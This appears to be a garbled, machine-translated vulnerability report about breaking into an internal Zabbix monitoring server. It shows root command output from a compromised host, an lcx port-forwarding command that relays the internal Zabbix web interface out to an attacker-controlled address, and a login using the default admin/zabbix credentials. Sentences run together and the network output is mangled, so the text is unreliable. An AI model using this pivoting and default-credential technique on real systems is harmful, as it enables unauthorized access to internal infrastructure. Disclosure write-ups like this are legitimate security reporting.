Zabbix can be used to add monitoring items and run commands. You can understand the following things. The main purpose of this hole is to remind everyone that zabbix should pay attention to the next struts vulnerability and slave (root) gid = 0 (root) groups = 0 (root) ifconfig eth2 Link encap: Ethernet HWaddr 00: 18: 8B: 83: 1B: 45 inet addr: 172.24.205.15 Bcast: 172.24.205.255 Mask: 255.255.0up broadcast running multicast mtu: 1500 Metric: 1RX packets: 81041 errors: 0 dropped: 0 overruns: 0 frame: 0TX packets: 60 errors: 0 dropped: 0 overruns: 0 carrier: 0 collisions: 0 txqueuelen: 1000 Interrupt: 16 Memory: f8000000-f8012800 followed
I also like to collect some scripts and learn from them. Let's take a look at the following: after so many years of Security, O & M has gradually become automated, and puppet, zabbix, and ldap should pay attention to it. The hacker intrusion also hopes to be automated. Vulnerability proof: it is a bit painful to have no Internet IP address. After curl http: // 172.24.162.38/zabbix/# returns the zabbix logon page to confirm the above information, first, you need to make a jump to a port of 172.24.205.15 to port 80 of 172.24.162.38, and then switch the port of 172.24.205.15 to the Internet, in this way, you can access the forwarding shown in Figure 0.0.0.0 98 172.24.162.38 80 and then forward port 98 to the public network. /lcx-m 3-h1 youip-p1 786-h2 127.0.0.1-p2 98 then see login: admin/zabbix
As for the future, and, you know,Solution:You are more professional than me.